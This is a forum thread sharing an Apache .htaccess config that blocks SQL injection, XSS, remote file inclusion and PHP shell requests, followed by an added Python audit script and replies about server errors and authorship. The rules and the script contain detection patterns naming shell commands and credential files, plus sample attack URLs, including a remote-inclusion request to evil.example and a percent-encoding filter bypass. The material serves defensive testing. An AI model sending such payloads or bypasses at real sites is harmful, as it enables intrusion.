how to block sql injection and php shell uploaders using the htaccess file


As the topic suggests, this is how to do it, and it even blocks the lame huward script lol.
This is a good .htaccess config file for noobs who have no idea how to stop a lot of these hacking techniques.

Code:
# Needs mod_rewrite and AllowOverride covering FileInfo, Options and Limit;
# on a host without those, Apache answers 500 Internal Server Error.
RewriteEngine on
Options -Indexes
Options +FollowSymlinks
# serve /page.htm from page.php
RewriteRule ^(.*)\.htm$ $1.php [NC]

# PHP settings, all commented out. php_value/php_flag only take effect under
# mod_php (not CGI/FastCGI PHP); note use_trans_sid is listed twice (0 and 1).
#php_value session.use_only_cookies 1
#php_value session.use_trans_sid 0
#php_flag register_globals off
#php_flag allow_url_include 0
#php_value upload_max_filesize 5M
#php_value max_execution_time 200
#php_value max_input_time 200
#php_value post_max_size 40M
#php_value session.use_trans_sid 1
#php_value safe_mode_gid 1
#php_value safe_mode_include_dir 1
#php_value magic_quotes_runtime 0
#php_value magic_quotes_sybase 0
#php_value allow_url_fopen 0
#php_value arg_separator.output "&"

Options +FollowSymlinks
# Common attack strings in the query string. Every condition below is ORed, so
# any single match is enough (the posted version left [OR] off the _REQUEST
# line, which tied the first six conditions to the keyword list).
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} http:.*\/.*\/ [OR]
# any slash past the first character of the query string, e.g. ?return=/foo (very broad)
RewriteCond %{QUERY_STRING} ..*\/ [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
# SQL keyword list; also matches harmless parameters such as ?action=update or ?q=select
RewriteCond %{QUERY_STRING} [^a-z](declare|char|set|cast|convert|delete|drop|exec|insert|meta|script|select|truncate|update)[^a-z] [NC]
RewriteRule (.*) - [F]

# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Answer blocked requests with 403 Forbidden ([F] makes Apache ignore the index.php target)
RewriteRule ^(.*)$ index.php [F,L]

DirectoryIndex index.php

SetEnv TZ Asia/Manila
AddDefaultCharset utf-8
DefaultLanguage en-US
LimitRequestBody 10240000

# Never serve these files directly
<FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">
Order Allow,Deny
Deny from all
</FilesMatch>

<IfModule mod_php4.c>
#php_value zlib.output_compression 16386
</IfModule>

AddType image/gif                       .gif .GIF
AddType image/ief                       .ief
AddType image/jpeg                      .jpeg .jpg .jpe .JPG
AddType image/tiff                      .tiff .tif
AuthName wapadik.net
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

# Remote file inclusion: a parameter whose value is a full http(s) URL.
# Blocked requests are rewritten to the blocker page (which must exist). The
# first condition keeps the rewritten request, which still carries the same
# query string, from matching again on the second pass through this file.
RewriteCond %{REQUEST_URI} !^/huwad/blocker/
RewriteCond %{REQUEST_METHOD} (GET) [NC]
RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)https(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)https%3a(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)http(%3A|:)(/|%2F){2}(.*)$ [NC]
RewriteRule (.*) /huwad/blocker/blocker1.php   [L]

# SQL keywords wrapped in %20. Only the raw, un-decoded query string is tested,
# so '+' or /**/ as the separator, or a percent-encoded letter, slips through.
RewriteCond %{REQUEST_URI} !^/huwad/blocker/
RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
RewriteCond %{QUERY_STRING} ^(.*)(%20SELECT%20|%20INSERT%20|CHAR\(|%20UPDATE%20|%20REPLACE%20)(.*)$ [NC]
RewriteRule (.*) /huwad/blocker/blocker1.php   [L]

# XSS probes, remote URLs in parameters, register_globals tricks, FrontPage
# paths, path traversal and the /proc/self/environ LFI trick.
RewriteCond %{REQUEST_URI} !^/huwad/blocker/
RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
RewriteCond %{QUERY_STRING} ^(.*)(%3C|<)/?script(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)(%3D|=)?javascript(%3A|:)(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)document\.location\.href(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)http%3a(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)ftp(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)ht%20tp(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)htt%20p(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)http%20(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)h%20ttp(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)base64_encode(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)GLOBALS(=|\[|%[0-9A-Z]{0,2})(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)_REQUEST(=|\[|%[0-9A-Z]{0,2})(.*)$ [OR]
RewriteCond %{REQUEST_URI} ^(.*)_vti(.*)$ [OR]
RewriteCond %{REQUEST_URI} ^(.*)MSOffice(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)/etc/passwd(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)//(.*)$ [OR]
RewriteCond %{REQUEST_URI} ^(.*)ShellAdresi.TXT(.*)$ [OR]
RewriteCond %{REQUEST_URI} ^(.*)\[evil_root\]?(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)\.\./\.\./\.\./(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)/proc/self/environ(.*)$
RewriteRule (.*) /huwad/blocker/blocker1.php   [L]

# Download tools and scrapers by User-Agent, well-known PHP shell file names
# (c99, r57, ...) and the parameter names those shells use. The method test
# comes first so the rest forms one OR group; in the posted version it sat in
# the middle of the chain and split it in two. The User-Agent list also blocks
# cURL, Wget, LWP/libwww, Jakarta (Java HttpClient) and WebDAV clients.
RewriteCond %{REQUEST_URI} !^/huwad/blocker/
RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
RewriteCond %{HTTP_USER_AGENT} @nonymouse|ADSARobot|amzn_assoc|Anarchie|ASPSeek|Atomz|^[^?]*addresses\.com|AdvancedEmailExtractor|ah-ha|aktuelles|almaden|Art-Online|AspiWeb|ASSORT|ATHENS|attach|attache|autoemailspider|BackWeb|Bandit|BatchFTP|bdfetch|big.brother|BlackWidow|bmclient|BostonProject|Botmailto:craftbot@yahoo.com|BravoBrianSpiderEngineMarcoPolo|Buddy|Bullseye|bumblebee|capture|CherryPicker|ChinaClaw|CICC|clipping|CrescentInternetToolPack|cURL|Custo|cyberalert|Deweb|diagem|Digger|Digimarc|DIIbot|DirectUpdate|DISCo|DownloadAccelerator|DownloadDemon|DownloadWonder|Downloader|Drip|DSurf15a|DTS.Agent|EasyDL|eCatch|echo\ extense|ecollector|efp@gmx\.net|EirGrabber|EmailCollector|EmailExtractor|EmailSiphon|EmailWolf|ExpressWebPictures|ExtractorPro|EyeNetIE|fastlwspider|FavOrg|FavoritesSweeper|FetchAPIRequest|FEZhead|FileHound|FlashGet|FlickBot|fluffy|frontpage|GalaxyBot|Generic|Getleft|GetRight|GetSmart|GetWeb!|GetWebPage|gigabaz|Girafabot|Go!Zilla|Go-Ahead-Got-It|GornKer|Grabber|GrabNet|Grafula|GreenResearch|Harvest|hhjhj@yahoo|hloader|HMView|HomePageSearch|HTTPagent|HTTPConnect|httpdown|httpgeneric|HTTrack|^[^?]*iaea\.org|IBM_Planetwide|^[^?]*\.ideography\.co\.uk|ImageStripper|ImageSucker|imagefetch|IncyWincy|IndyLibrary|informant|Ingelin|InterGET|InternetNinja|InternetLinkAgent|InternetSeer\.com|Iria|Irvine|iOpus|IPiumBotlaurion(dot)com|Jakarta|JBH*Agent|JetCar|JustView|Kapere|KWebGet|Lachesis|larbin|LeechFTP|LexiBot|lftp|libwww|likse|Link*Sleuth|LINKSARoMATIZED|LinkWalker|LWP|lwp-trivial|Magnet|MacFinder|Mag-Net|MassDownloader|MemoWeb|MCspider|MicrosoftURLControl|MIDowntool|minibot\(NaverRobot\)|Mirror|MissiguaLocator|MisterPiX|MMMtoCrawl\/UrlDispatcherLLL|MSProxy|multithreaddb|nationaldirectory|Navroad|NearSite|NetAnts|NetCarta|netfactual|netcraft|NetMechanic|netprospector|NetResearchServer|NetSpider|NetVampire|NetZIP|NEWT|nicerspro|NPBot|Octopus|OfflineExplorer|OfflineNavigator|OpaL|Openfind|OpenTextSiteCrawler|OutWit|PackRat|PageGrabber|PapaFoto|pavuk|pcBrowser|PersonaPilot|PingALink|Pockey|ProgramShareware|psbot|PSurf|puf|Pump|PushSite|QRVA|QuepasaCreep|RealDownload|Reaper|Recorder|ReGet|replacer|RepoMonkey|Robozilla|Rover|RPT-HTTPClient|Rsync|SearchExpress|searchhippo|searchterms\.it|SecondStreetResearch|Shai|sitecheck|SiteMapper|SiteSnagger|SlySearch|SmartDownload|snagger|SpaceBison|Spegla|SpiderBot|SqWorm|StarDownloader|Stripper|Sucker|SuperBot|SuperHTTP|Surfbot|SurfWalker|Szukacz|tAkeOut|tarspider|TeleportPro|Telesoft|Templeton|traffixer|TrueRobot|TuringOS|TurnitinBot|TV33_Mercator|UIowaCrawler|URL_Spider_Pro|UtilMind|Vacuum|vagabondo|vayala|visibilitygap|vobsub|VoidEYE|vspider|w3mir|web\.by\.mail|WebDataExtractor|WebDownloader|WebImageCollector|WebSucker|WebAuto|webbandit|Webclipping|webcollector|webcollage|WebCopier|webcraft@bea|WebDAV|webdevil|webdownloader|Webdup|WebEmailExtractor|WebFetch|WebGoIS|WebHook|Webinator|WebLeacher|WebMiner|WebMirror|webmole|WebReaper|WebSauger|WEBsaver|WebsiteeXtractor|WebsiteQuester|WebSnake|Webster|WebStripper|websucker|webvac|webwalk|webweasel|WebWhacker|WebZIP|Wget|whizbang|WhosTalking|Widow|WISEbot|WUMPUS|Wweb|WWWOFFLE|Wysigot|XaldonWebSpider|XGET|x-Tractor|Zeus.* [OR]
RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)=/home(.+)?/(.*)/(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|grablogins|upload.*)|((chmod|f)&f=.*))$ [OR]
RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback|cmd|gofile|mkfile)&d=.*$ [OR]
RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree&d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmdir|pwd|clear|whoami|uname|tar|zip|unzip|tar|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)([^a-zA-Z0-9].+)*$ [OR]
# unanchored: also matches 'system' inside ordinary words such as ecosystem
RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$
# This rule was commented out in the posted version, which left every
# condition above unenforced; the blocker page must exist for it to work.
RewriteRule (.*) /huwad/blocker/blocker3.php   [L]

<Files 403.shtml>
order allow,deny
allow from all
</Files>

# Single-IP bans (need AllowOverride Limit)
deny from 203.177.42.214
deny from 112.198.79.105

Don't Ask Me Dumb Questions. Or you'll get a Dumb Answer..
Want A Professional Logo or Theme For Your wap site? PM Me. If I Have The Time I'll Make It For Free
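Added example, not part of the post above and not something that ships with the config: a Python script that transcribes a subset of the posted RewriteCond patterns and runs constructed request URLs through them, to show which requests the rules catch, where they match ordinary parameters by mistake, and how percent-encoding a single letter slips past a pattern that only sees the raw query string. The rule labels, the `blocked_by` and `audit` functions and the sample URLs are my own; Apache itself is not involved, and the sample requests are made up, not captured traffic.

```python
import re
from urllib.parse import urlsplit

# A subset of the RewriteCond patterns from the posted .htaccess, transcribed
# to Python's re module (the constructs used here behave the same in PCRE).
# The labels are my own and do not appear in the .htaccess. Conditions that
# carried [NC] get re.I; the others stay case-sensitive, as Apache runs them.
QUERY_RULES = {
    "sql-keyword": (r"[^a-z](declare|char|set|cast|convert|delete|drop|exec|insert"
                    r"|meta|script|select|truncate|update)[^a-z]", re.I),
    "sql-spaced":  (r"^(.*)(%20SELECT%20|%20INSERT%20|CHAR\(|%20UPDATE%20|%20REPLACE%20)(.*)$", re.I),
    "script-tag":  (r"(\<|%3C).*script.*(\>|%3E)", re.I),
    "remote-url":  (r"^(.*)(%3D|=|%3A|%09)http(%3A|:)(/|%2F){2}(.*)$", re.I),
    "globals":     (r"GLOBALS(=|\[|\%[0-9A-Z]{0,2})", 0),
    "etc-passwd":  (r"^(.*)/etc/passwd(.*)$", 0),
    "shell-funcs": (r"^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$", 0),
}
URI_RULES = {
    "shell-filename": (r".*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*"
                       r"|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)"
                       r"\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml)", re.I),
}


def blocked_by(url: str) -> list:
    """Names of the rules that fire for one request's path?query.

    mod_rewrite tests %{QUERY_STRING} and %{REQUEST_URI} as received, before
    any percent-decoding, so the patterns run on the raw strings here too
    (which is also why the original lists both '<' and '%3C').
    """
    parts = urlsplit(url)
    hits = [name for name, (pat, flags) in QUERY_RULES.items()
            if re.search(pat, parts.query, flags)]
    hits += [name for name, (pat, flags) in URI_RULES.items()
             if re.search(pat, parts.path, flags)]
    return hits


# Constructed sample requests (not real traffic): (request, what to expect).
SAMPLES = [
    ("/index.php?id=1%20UNION%20SELECT%20user,password%20FROM%20users",
     "classic injection, caught by both SQL rules"),
    ("/index.php?id=1+UNION+SELECT+user,password+FROM+users",
     "'+' instead of %20: only the keyword rule fires"),
    ("/index.php?id=1+UNION+SEL%45CT+user,password+FROM+users",
     "one letter percent-encoded: nothing fires, yet PHP decodes it to SELECT"),
    ("/index.php?page=http://evil.example/shell.txt", "remote file inclusion attempt"),
    ("/index.php?q=%3Cscript%3Ealert(1)%3C/script%3E", "reflected XSS probe"),
    ("/index.php?file=../../../../etc/passwd", "path traversal"),
    ("/c99.php?act=cmd", "known shell file name"),
    ("/index.php?GLOBALS[foo]=bar", "register_globals poisoning"),
    ("/search.php?q=select+a+theme", "FALSE POSITIVE: ordinary search term"),
    ("/blog.php?tag=ecosystem", "FALSE POSITIVE: 'system' inside a word"),
    ("/index.php?action=update&id=3", "FALSE POSITIVE: ordinary action parameter"),
]


def audit(samples=SAMPLES) -> dict:
    """Map each sample request to the rule names that would block it."""
    return {req: blocked_by(req) for req, _ in samples}


if __name__ == "__main__":
    for req, note in SAMPLES:
        hits = blocked_by(req)
        print(f"{'BLOCK' if hits else 'pass '}  {req}\n       {note}: {hits}")
```

Run it and compare the three FALSE POSITIVE lines with the `SEL%45CT` line: the keyword rule blocks a user searching for the word "select" while a trivially encoded injection walks through, which is the usual trade-off with query-string regex filters. They are a speed bump in front of an old script, not a replacement for parameterised queries and a real upload check.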


    #2
    Where did you get this? Very familiar .htaccess lol!
    com site: http://vampist.net
    download site: http://wapdloads.net
    fb: http://www.facebook.com/pmplx

      #3
      secret lol

        #4
        wapadik.net ? lol

          #5
          Nice share rampage, I guess this will work for newbies.

            #6
            Internal Server Error . .

            That's what I get.
            Wapchat4u
            Topsites4u

              #7
              How to use that on hosting that doesn't support .htaccess?

                #8
                Well, it's .htaccess. Don't use a free host, and not the wapadikt script lol

                  #9
                  Misconfiguration @hadian

                    #10
                    Will it work if I add it in php.ini?
                    ________________
                    Jacques
                    jacques@gw-designs.co.za
                    http://coding.biz.tm
                    Come join and let's make it a place to teach all the noobies how to code
                    __________________

                    NEVER FORGET TO CLICK THE TANX BUTTON IF YOU LIKE WHAT I'M SHARING OR HELPING WITH

                      #11
                      Maybe not riderz bro. Some methods are made only for .htaccess.

                        #12
                        When I put it in my .htaccess, I got something like this: Internal Server Error

                        The server encountered an internal error or misconfiguration and was unable to complete your request.

                        Please contact the server administrator, webmaster@******.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

                        More information about this error may be available in the server error log.

                        Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
                        Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at ********.com Port 80

                          #13
                          Originally posted by jaidon20k:
                          When I put it in my .htaccess, I got something like this: Internal Server Error
                          Some host servers are not suitable for .htaccess code like that. Different config, I guess!

                            #14
                            Who coded this? huwad or ozziemale31..
                            huwad called this his site defender script.
                            Last edited by abipol; 03.10.10, 02:08.

                              #15
                              It was never taken from that zip folder, that I can assure you.. and not once did I say I coded the htaccess file.
                              Adding things to htaccess is not coding, you ****. Everything can be googled for it.. If people like you aren't happy with what I share here then I simply won't help anyone code anything anymore.. Unlike you I am not a noob. This is why I stopped support for my mobilezonez script. People want want want and always criticize, but are too lazy to code their own ****. And huward didn't code this htaccess file, you knobhead.